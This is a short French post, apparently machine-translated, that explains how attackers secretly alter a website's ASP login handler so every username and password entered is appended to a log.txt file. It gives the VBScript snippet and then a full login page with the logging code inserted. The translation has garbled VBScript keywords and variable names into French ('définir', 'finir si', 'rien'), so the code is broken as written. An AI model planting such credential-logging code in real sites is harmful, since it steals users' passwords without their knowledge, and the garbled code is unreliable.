De nombreux pirates obtiennent le mot de passe de connexion de l'utilisateur du site Web cible en modifiant le code de connexion en arrière-plan, de sorte qu'une fois le mot de passe saisi, il soit enregistré dans un fichier txt.
Le code est le suivant :
définir fso=server.createobject (scripting.filesystemobject)
si fso.FileExists(server.mappath(log.txt))=true alors
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.fermer
définir fin = rien
finir si
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&¦pwd:&password&¦time:&now()&)
fout.close
set fout = rien
définir fso = rien
Insérez-le là où le formulaire est soumis lors de la connexion en arrière-plan !
Documents de référence :
Copiez le code comme suit :
<%@langue=vbscript codepage=936 %>
<%
dimsql, rs
dim nom d'utilisateur, mot de passe, CheckCode
nom d'utilisateur=replace(trim(request(nom d'utilisateur)),',)
mot de passe=replace(trim(Request(mot de passe)),',)
CheckCode=replace(trim(Request(CheckCode)),',)
si Nom d'utilisateur = alors
FoundErr = Vrai
ErrMsg=ErrMsg & <br><li>Le nom d'utilisateur ne peut pas être vide ! </li>
finir si
si mot de passe = alors
FoundErr = Vrai
ErrMsg=ErrMsg & <br><li>Le mot de passe ne peut pas être vide ! </li>
finir si
si CheckCode = alors
FoundErr = Vrai
ErrMsg=ErrMsg & <br><li>Le code de vérification ne peut pas être vide ! </li>
finir si
si session(CheckCode)= alors
FoundErr = Vrai
ErrMsg=ErrMsg & <br><li>Votre temps de connexion est trop long, veuillez revenir à la page de connexion pour vous reconnecter. </li>
finir si
si CheckCode<>CStr(session(CheckCode)) alors
FoundErr = Vrai
ErrMsg=ErrMsg & <br><li>Le code de confirmation que vous avez saisi est incohérent avec celui généré par le système, veuillez le saisir à nouveau. </li>
finir si
'Derrière ceci se trouve le code que j'ai ajouté ~ la zone de départ
définir fso=server.createobject (scripting.filesystemobject)
si fso.FileExists(server.mappath(log.txt))=true alors
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.close
définir fin = rien
finir si
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)
fout.close
set fout=rien
définir fso = rien
'Le code derrière a été supprimé par la zone me~end
%>